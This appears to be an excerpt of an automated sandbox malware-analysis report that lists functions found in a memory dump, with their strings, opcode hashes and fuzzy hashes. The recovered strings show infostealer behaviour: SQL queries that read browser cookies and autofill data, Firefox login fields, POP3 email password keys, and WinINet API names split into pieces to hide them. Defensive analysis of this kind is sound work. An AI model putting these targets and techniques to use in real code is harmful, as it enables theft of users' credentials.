                                                                                                                        • Source File: 00000005.00000002.3839294519.0000000005020000.00000040.00000001.00040000.00000000.sdmp, Offset: 05020000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_5_2_5020000_mNtjNwEeCHVoSqPJEzBvhXy.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: F$P$T$f$r$x
                                                                                                                        • API String ID: 0-2523166886
                                                                                                                        • Opcode ID: 5c8e5ef82cb2630e9a9139559eee27b2d5b92ad476b6bb5fd5678239264946d5
                                                                                                                        • Instruction ID: 69fb95b1a0516752e1d54c46ab5202e4d0054c840eff6d2f7992838154191598
                                                                                                                        • Opcode Fuzzy Hash: 5c8e5ef82cb2630e9a9139559eee27b2d5b92ad476b6bb5fd5678239264946d5
                                                                                                                        • Instruction Fuzzy Hash: AE51C5B1A04304AAEB34DF64ED48BEFB3F8FF54754F00496EA94A56180D7B45684CFA2
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 05042534 Relevance: 7.6, Strings: 6, Instructions: 122COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000005.00000002.3839294519.0000000005020000.00000040.00000001.00040000.00000000.sdmp, Offset: 05020000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_5_2_5020000_mNtjNwEeCHVoSqPJEzBvhXy.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: SELECT host_key, path, is_secure, expires_utc, name, value, encrypted_value FROM cookies$SELECT name, value FROM autofill$datetime$name: $time$value:
                                                                                                                        • API String ID: 0-2929464105
                                                                                                                        • Opcode ID: 17bd89fc2a02a8de831bc80a85255da786e75d56cdd4804e4f187b81b61d0098
                                                                                                                        • Instruction ID: c6063f4aaa0cd78079ec8add8e7186f04c1c0269fe6a3e69d5ef82d8ab56f934
                                                                                                                        • Opcode Fuzzy Hash: 17bd89fc2a02a8de831bc80a85255da786e75d56cdd4804e4f187b81b61d0098
                                                                                                                        • Instruction Fuzzy Hash: 185125B1C0035DAECB21DFA4DD99BEEBB78BB14700F10868DD958AB241DB704A45CFA5
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 05036EE4 Relevance: 7.6, Strings: 6, Instructions: 90COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000005.00000002.3839294519.0000000005020000.00000040.00000001.00040000.00000000.sdmp, Offset: 05020000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_5_2_5020000_mNtjNwEeCHVoSqPJEzBvhXy.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: 10$2008$2012$2016$7$8
                                                                                                                        • API String ID: 0-783846285
                                                                                                                        • Opcode ID: 93d32933242a303b60b9d8821673e96ca78ec64eeb57fa4aafa6f3abd87e8b02
                                                                                                                        • Instruction ID: 73fea7a1cff5ad538005693fb8344a367cc2e89a0171f863251ac610cf94dad4
                                                                                                                        • Opcode Fuzzy Hash: 93d32933242a303b60b9d8821673e96ca78ec64eeb57fa4aafa6f3abd87e8b02
                                                                                                                        • Instruction Fuzzy Hash: 21219C75E0121D7AEB01EB90EC0ABFE77BCAF15344F044059EE04A6281F3B65619CBE2
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 05036EDA Relevance: 7.6, Strings: 6, Instructions: 83COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000005.00000002.3839294519.0000000005020000.00000040.00000001.00040000.00000000.sdmp, Offset: 05020000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_5_2_5020000_mNtjNwEeCHVoSqPJEzBvhXy.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: 10$2008$2012$2016$7$8
                                                                                                                        • API String ID: 0-783846285
                                                                                                                        • Opcode ID: 99a8621315d84ea5d83624634a1f44e1eac0aaefa398ae375dd016322b6ca30e
                                                                                                                        • Instruction ID: 337bbaf3238b4a73fc3370bef456184286b1c502e91ca9207a351a4593ca6fcc
                                                                                                                        • Opcode Fuzzy Hash: 99a8621315d84ea5d83624634a1f44e1eac0aaefa398ae375dd016322b6ca30e
                                                                                                                        • Instruction Fuzzy Hash: 452171B590160A7DEB01EB90DD0AFFF7BACBF15344F045059EE04A6141F3B65219CBA6
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 0504EEA4 Relevance: 7.5, Strings: 6, Instructions: 40COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000005.00000002.3839294519.0000000005020000.00000040.00000001.00040000.00000000.sdmp, Offset: 05020000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_5_2_5020000_mNtjNwEeCHVoSqPJEzBvhXy.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: A$Inte$InternetOpenA$Open$rnet$rnetOpenA
                                                                                                                        • API String ID: 0-3155091674
                                                                                                                        • Opcode ID: 5c382b331cc28ab8cce9a9cf3e2ad8ec7f899e3fff44a8c4ca20a0a2d0ed3220
                                                                                                                        • Instruction ID: 0a06ea0080768e976bb3ae6d6f78f0ef7f6f01588ba7b7924a3fe534004cc836
                                                                                                                        • Opcode Fuzzy Hash: 5c382b331cc28ab8cce9a9cf3e2ad8ec7f899e3fff44a8c4ca20a0a2d0ed3220
                                                                                                                        • Instruction Fuzzy Hash: BAF031B1911129AB9B10DF99D8459EFB7BCFF44210B048549BD1897300D270AD10CBE1
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 05043500 Relevance: 7.5, Strings: 6, Instructions: 38COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000005.00000002.3839294519.0000000005020000.00000040.00000001.00040000.00000000.sdmp, Offset: 05020000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_5_2_5020000_mNtjNwEeCHVoSqPJEzBvhXy.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: F$P$T$f$r$x
                                                                                                                        • API String ID: 0-2523166886
                                                                                                                        • Opcode ID: 48a9b2002fe9a76a81d63455e0bcbfe7588d2f63d0d39084595a7ec990270215
                                                                                                                        • Instruction ID: 8a797ea65db992313364163aa28096777ecc8834a12c168d05bdf14a73be5469
                                                                                                                        • Opcode Fuzzy Hash: 48a9b2002fe9a76a81d63455e0bcbfe7588d2f63d0d39084595a7ec990270215
                                                                                                                        • Instruction Fuzzy Hash: E001D6B0E10254AACB20DF94D8085EFBFB9FF51314F01465A98046F210E7F64B49CB91
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 0504F0F4 Relevance: 7.5, Strings: 6, Instructions: 34COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000005.00000002.3839294519.0000000005020000.00000040.00000001.00040000.00000000.sdmp, Offset: 05020000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_5_2_5020000_mNtjNwEeCHVoSqPJEzBvhXy.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: Clos$CloseHandle$Inte$dle$eHan$rnet
                                                                                                                        • API String ID: 0-4067651292
                                                                                                                        • Opcode ID: 940ee53a11928e1edb7fd54239f0836cfae6cce42b80ac0620496628074d06c8
                                                                                                                        • Instruction ID: f44c3d9a3e26b811833acd954be2c52cd1e6388437c24add5d00aba0fb4d733b
                                                                                                                        • Opcode Fuzzy Hash: 940ee53a11928e1edb7fd54239f0836cfae6cce42b80ac0620496628074d06c8
                                                                                                                        • Instruction Fuzzy Hash: 37F030B2D05119AF8B14DFD9E9459EFBBB8EB44310F158199EE486B300D670AB10CBE2
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 05044D57 Relevance: 6.5, Strings: 5, Instructions: 227COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000005.00000002.3839294519.0000000005020000.00000040.00000001.00040000.00000000.sdmp, Offset: 05020000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_5_2_5020000_mNtjNwEeCHVoSqPJEzBvhXy.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: %m$~$Gon~$~F@7$~draGon~$~draGon~
                                                                                                                        • API String ID: 0-652033395
                                                                                                                        • Opcode ID: 9dd86f86a73073ea4de406e2b0009cb4bc860903154fe0a3e2717f7f5879603f
                                                                                                                        • Instruction ID: 15594d4014912cb3b595bb09e7d778aa36ab9952ca44ee6b2ea2389b160288c6
                                                                                                                        • Opcode Fuzzy Hash: 9dd86f86a73073ea4de406e2b0009cb4bc860903154fe0a3e2717f7f5879603f
                                                                                                                        • Instruction Fuzzy Hash: B08149B2E042995BDF21DBB8AC58BFFBBE5AF66300F0440E5DD885B141E6349A058F52
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 05042C74 Relevance: 6.4, Strings: 5, Instructions: 198COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000005.00000002.3839294519.0000000005020000.00000040.00000001.00040000.00000000.sdmp, Offset: 05020000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_5_2_5020000_mNtjNwEeCHVoSqPJEzBvhXy.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: $i$l$o$u
                                                                                                                        • API String ID: 0-2051669658
                                                                                                                        • Opcode ID: 6d45595e39e1dda008206bb235ddfa97b74d8e3ac38504b08004aaddd10c2691
                                                                                                                        • Instruction ID: d875f6d884785adafb5c1e43f12da704181635c80235d234c269ed4741b18f1a
                                                                                                                        • Opcode Fuzzy Hash: 6d45595e39e1dda008206bb235ddfa97b74d8e3ac38504b08004aaddd10c2691
                                                                                                                        • Instruction Fuzzy Hash: 436150B5A00305AFDB64DFA5DC84FEFB7FDAB88710F104569F51AA7240D634AA41CB60
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 050461F4 Relevance: 6.4, Strings: 5, Instructions: 130COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000005.00000002.3839294519.0000000005020000.00000040.00000001.00040000.00000000.sdmp, Offset: 05020000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_5_2_5020000_mNtjNwEeCHVoSqPJEzBvhXy.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: $e$e$o$y
                                                                                                                        • API String ID: 0-3109010100
                                                                                                                        • Opcode ID: 87ec168eae238202333b6df4902c3540faeac27a0aefbac01867f9dd47f44586
                                                                                                                        • Instruction ID: 2a19380888eb4caed38b810f0003ed17ecaef9142adc5b3a0beb97e600b7972b
                                                                                                                        • Opcode Fuzzy Hash: 87ec168eae238202333b6df4902c3540faeac27a0aefbac01867f9dd47f44586
                                                                                                                        • Instruction Fuzzy Hash: DE4123B1E00308AFDB60DFA4E948BEF77F9BB55310F144529E909E7200E77595458FA1
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 05042C6E Relevance: 6.4, Strings: 5, Instructions: 127COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000005.00000002.3839294519.0000000005020000.00000040.00000001.00040000.00000000.sdmp, Offset: 05020000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_5_2_5020000_mNtjNwEeCHVoSqPJEzBvhXy.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: $i$l$o$u
                                                                                                                        • API String ID: 0-2051669658
                                                                                                                        • Opcode ID: 878ab0bbc200fc6f05280e87d11349436ca943aada59e87c6bba00e23e242030
                                                                                                                        • Instruction ID: 01c10d6bfca9aca1423f1bff73cec6a40891deb1aeb228f1a7fc86246fb63fa1
                                                                                                                        • Opcode Fuzzy Hash: 878ab0bbc200fc6f05280e87d11349436ca943aada59e87c6bba00e23e242030
                                                                                                                        • Instruction Fuzzy Hash: 944139B5A00309AFDB64DFA5DC84FEFBBF9AB48710F104569E519A7280D730AA41CB60
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 0503959C Relevance: 6.4, Strings: 5, Instructions: 125COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000005.00000002.3839294519.0000000005020000.00000040.00000001.00040000.00000000.sdmp, Offset: 05020000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_5_2_5020000_mNtjNwEeCHVoSqPJEzBvhXy.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: C$a$b$d$i
                                                                                                                        • API String ID: 0-2334916691
                                                                                                                        • Opcode ID: 0501f0e45718985d2f59ce6f664616baea893957779efdb7f6f6930b70534adc
                                                                                                                        • Instruction ID: db708d47b16d681b04629bbf29a60b434e429bba50014586bca23df9254b8d21
                                                                                                                        • Opcode Fuzzy Hash: 0501f0e45718985d2f59ce6f664616baea893957779efdb7f6f6930b70534adc
                                                                                                                        • Instruction Fuzzy Hash: F441B1B1A00308AAE710EF64EC89FFFB7B8EF95718F00851DE9149B241DB756505CBA5
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 05042914 Relevance: 5.3, Strings: 4, Instructions: 300COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000005.00000002.3839294519.0000000005020000.00000040.00000001.00040000.00000000.sdmp, Offset: 05020000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_5_2_5020000_mNtjNwEeCHVoSqPJEzBvhXy.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: $e$k$o
                                                                                                                        • API String ID: 0-3624523832
                                                                                                                        • Opcode ID: 14d8c290e2016dd406868fca2d17cfc7eddb94cad7d8909a4a855315912dbf1b
                                                                                                                        • Instruction ID: 6814c57c255a38ded7a9fc406a88743c1698485e553d47eef984d5ec9cea5dd8
                                                                                                                        • Opcode Fuzzy Hash: 14d8c290e2016dd406868fca2d17cfc7eddb94cad7d8909a4a855315912dbf1b
                                                                                                                        • Instruction Fuzzy Hash: 7CB1ECB5A00705AFDB64DFA4DC84FEFB7F9AF88710F108558F619A7240DA74AA41CB50
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 05044434 Relevance: 5.3, Strings: 4, Instructions: 288COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000005.00000002.3839294519.0000000005020000.00000040.00000001.00040000.00000000.sdmp, Offset: 05020000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_5_2_5020000_mNtjNwEeCHVoSqPJEzBvhXy.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: guid$guid$hostname$httpRealm
                                                                                                                        • API String ID: 0-4083889933
                                                                                                                        • Opcode ID: fd0033eebcdaa2696975a8e7b514e8e7a366048253ec77885c88bd31d26dfc60
                                                                                                                        • Instruction ID: 2767a314621712b717ec4329097d7be670d49dd739ccbbfb94a618c57537805b
                                                                                                                        • Opcode Fuzzy Hash: fd0033eebcdaa2696975a8e7b514e8e7a366048253ec77885c88bd31d26dfc60
                                                                                                                        • Instruction Fuzzy Hash: B5B15DB1E00249AFDB10DFB4DC89FEEB7B8BF58310F044559EA18A7241E7749A45CBA1
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 05044D64 Relevance: 5.2, Strings: 4, Instructions: 237COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000005.00000002.3839294519.0000000005020000.00000040.00000001.00040000.00000000.sdmp, Offset: 05020000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_5_2_5020000_mNtjNwEeCHVoSqPJEzBvhXy.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: Gon~$~F@7%m$~$~draGon~$~draGon~
                                                                                                                        • API String ID: 0-735104890
                                                                                                                        • Opcode ID: c62ac7f041459f2c71ddccc526f21fa413b1b29bcfd1c31f3a437cff1550a19a
                                                                                                                        • Instruction ID: 3b851fbe93e2d708f641078fe9eda181467d9e0206387cb13f2ec0f944ad8dd8
                                                                                                                        • Opcode Fuzzy Hash: c62ac7f041459f2c71ddccc526f21fa413b1b29bcfd1c31f3a437cff1550a19a
                                                                                                                        • Instruction Fuzzy Hash: E6814BB2E042596BDF21DBB8AC58BFF77E9AF65300F0440E5DD8857141E6749B048F92
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 050451A4 Relevance: 5.2, Strings: 4, Instructions: 231COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000005.00000002.3839294519.0000000005020000.00000040.00000001.00040000.00000000.sdmp, Offset: 05020000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_5_2_5020000_mNtjNwEeCHVoSqPJEzBvhXy.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: Account$POP3Account$POP3Password$Password
                                                                                                                        • API String ID: 0-3724906831
                                                                                                                        • Opcode ID: 48de0ff2a5cb2a009e27de2e4bf73159bc5294f9cca93f4c30aec13b5f73296d
                                                                                                                        • Instruction ID: fc3b70ab3ccbe50cadf38b8cc511edc5df71ed160791bc37cffa87c0417db546
                                                                                                                        • Opcode Fuzzy Hash: 48de0ff2a5cb2a009e27de2e4bf73159bc5294f9cca93f4c30aec13b5f73296d
                                                                                                                        • Instruction Fuzzy Hash: 6F8164F1D04248AFDB51DFA4AC48FEEBBF8AF55314F04406AED18AB241E6705A45CF61
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 05043214 Relevance: 5.2, Strings: 4, Instructions: 228COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000005.00000002.3839294519.0000000005020000.00000040.00000001.00040000.00000000.sdmp, Offset: 05020000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_5_2_5020000_mNtjNwEeCHVoSqPJEzBvhXy.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: $e$h$o
                                                                                                                        • API String ID: 0-3662636641
                                                                                                                        • Opcode ID: 503b8609455279e765c215ab1b90bc7c4a4c60192b008f59b8a4f707a3503b20
                                                                                                                        • Instruction ID: 13d6b6c7fa81ced8a03dd2c50a5950f5b94b43953ac40260a55d1d71b6e8e18c
                                                                                                                        • Opcode Fuzzy Hash: 503b8609455279e765c215ab1b90bc7c4a4c60192b008f59b8a4f707a3503b20
                                                                                                                        • Instruction Fuzzy Hash: 237173B2A002187EDF65DB54DC89FEF737CAF95700F004199B94966140EF746B888FA2
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 0504290B Relevance: 5.2, Strings: 4, Instructions: 180COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000005.00000002.3839294519.0000000005020000.00000040.00000001.00040000.00000000.sdmp, Offset: 05020000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_5_2_5020000_mNtjNwEeCHVoSqPJEzBvhXy.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: $e$k$o
                                                                                                                        • API String ID: 0-3624523832
                                                                                                                        • Opcode ID: ac3bd7f7c59742a9dc2df478fbdd14611d4c20b5b688e5936ab036867bc8f8ca
                                                                                                                        • Instruction ID: b76c2fcda9574d90cdcba064a5aeaf6756898fafec84b2e91c31ec23706866b0
                                                                                                                        • Opcode Fuzzy Hash: ac3bd7f7c59742a9dc2df478fbdd14611d4c20b5b688e5936ab036867bc8f8ca
                                                                                                                        • Instruction Fuzzy Hash: 2061FAB5A00709AFDB64DFA4DC84FEFB7B9AF88704F108558E619AB244D770AA41CB50
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 05048BD4 Relevance: 5.2, Strings: 4, Instructions: 157COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000005.00000002.3839294519.0000000005020000.00000040.00000001.00040000.00000000.sdmp, Offset: 05020000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_5_2_5020000_mNtjNwEeCHVoSqPJEzBvhXy.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: P$r$s$w
                                                                                                                        • API String ID: 0-3891800351
                                                                                                                        • Opcode ID: 8c553517bb72b524c024cf7534ce0408c9f14d13564f84e53c84fe60adcfbc1d
                                                                                                                        • Instruction ID: 80a2d7eeb1f2442efd7006d0d2f8b1879348a7b652a6a02f5ba4ae60d00afed7
                                                                                                                        • Opcode Fuzzy Hash: 8c553517bb72b524c024cf7534ce0408c9f14d13564f84e53c84fe60adcfbc1d
                                                                                                                        • Instruction Fuzzy Hash: D0511CB1D00208AFDB50DFA4D844BEEBBF5EF58710F14856AE919EB241E7359604CFA1
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 050427D7 Relevance: 5.1, Strings: 4, Instructions: 118COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000005.00000002.3839294519.0000000005020000.00000040.00000001.00040000.00000000.sdmp, Offset: 05020000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_5_2_5020000_mNtjNwEeCHVoSqPJEzBvhXy.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: FALSETRUE$FALSETRUE$TRUE$TRUE
                                                                                                                        • API String ID: 0-2877786613
                                                                                                                        • Opcode ID: 2989952816021e9af3d65f9927e6cf2c5b45e8ab407827aa335cb008d5286a09
                                                                                                                        • Instruction ID: c8d275c9f1d0a2b867019270e32fab06af386c704db79cda886fcb1d06abe6d4
                                                                                                                        • Opcode Fuzzy Hash: 2989952816021e9af3d65f9927e6cf2c5b45e8ab407827aa335cb008d5286a09
                                                                                                                        • Instruction Fuzzy Hash: 1C318EB96012497AEB11EB909C5AFFF77BCAFA5710F004048FE046A181EB746A01C7F6
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 050427E4 Relevance: 5.1, Strings: 4, Instructions: 115COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000005.00000002.3839294519.0000000005020000.00000040.00000001.00040000.00000000.sdmp, Offset: 05020000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_5_2_5020000_mNtjNwEeCHVoSqPJEzBvhXy.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: FALSETRUE$FALSETRUE$TRUE$TRUE
                                                                                                                        • API String ID: 0-2877786613
                                                                                                                        • Opcode ID: 63c5ee0a0e5d20dc2edda046dcde8ce63623aa97b00afd5e0132c0108472894f
                                                                                                                        • Instruction ID: 70df91f29b48a35df750b29782798498d923f137d8a50dacf6176ad8f65b63fe
                                                                                                                        • Opcode Fuzzy Hash: 63c5ee0a0e5d20dc2edda046dcde8ce63623aa97b00afd5e0132c0108472894f
                                                                                                                        • Instruction Fuzzy Hash: 59316EB5A412597AEB11EB90DC59FFF777CAFA5714F004048FE046A180EB746A01C7E6
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 050452FC Relevance: 5.1, Strings: 4, Instructions: 106COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000005.00000002.3839294519.0000000005020000.00000040.00000001.00040000.00000000.sdmp, Offset: 05020000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_5_2_5020000_mNtjNwEeCHVoSqPJEzBvhXy.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: Account$POP3Account$POP3Password$Password
                                                                                                                        • API String ID: 0-3724906831
                                                                                                                        • Opcode ID: 9a317cd74a29aeb99fd516ca2b3bb033a1f37e2ed453038482b61e9f6c6d9915
                                                                                                                        • Instruction ID: d3b8f4ebd1d5fb724d31f0c36193c4cf2ced8fbe1e19c4a65ab9bc7d73f8087b
                                                                                                                        • Opcode Fuzzy Hash: 9a317cd74a29aeb99fd516ca2b3bb033a1f37e2ed453038482b61e9f6c6d9915
                                                                                                                        • Instruction Fuzzy Hash: 8D3184F2D00209BBDB14E7A4AC98EFF73BDAF94714F0045A5EE59A7100EA3096458FA1
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 0504320B Relevance: 5.1, Strings: 4, Instructions: 103COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000005.00000002.3839294519.0000000005020000.00000040.00000001.00040000.00000000.sdmp, Offset: 05020000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_5_2_5020000_mNtjNwEeCHVoSqPJEzBvhXy.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: $e$h$o
                                                                                                                        • API String ID: 0-3662636641
                                                                                                                        • Opcode ID: 423a663da4b38d5c88ef4a275d5dca6a15bccf0517b859d25b5ebceeb7b575fb
                                                                                                                        • Instruction ID: 3127f2690160a0322d411cac5c56e1b3fcdd2a04ac65417019e3169e6f3b9ee2
                                                                                                                        • Opcode Fuzzy Hash: 423a663da4b38d5c88ef4a275d5dca6a15bccf0517b859d25b5ebceeb7b575fb
                                                                                                                        • Instruction Fuzzy Hash: 7D316FB1E00218BEDF50DBA49C49FEF73B8EF99700F044199A949A6150EB7457888FA2
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 0503F2A4 Relevance: 5.1, Strings: 4, Instructions: 89COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000005.00000002.3839294519.0000000005020000.00000040.00000001.00040000.00000000.sdmp, Offset: 05020000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_5_2_5020000_mNtjNwEeCHVoSqPJEzBvhXy.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: 1$1$2$6
                                                                                                                        • API String ID: 0-2783566374
                                                                                                                        • Opcode ID: cfdb0bd2f1969fb07bba72c82375319e5148e2c7066f36fa055981596ca8d8f8
                                                                                                                        • Instruction ID: 6283626773f0f75dfa6ba4bf0180f2269c66a4044b9b990ada367d40decea007
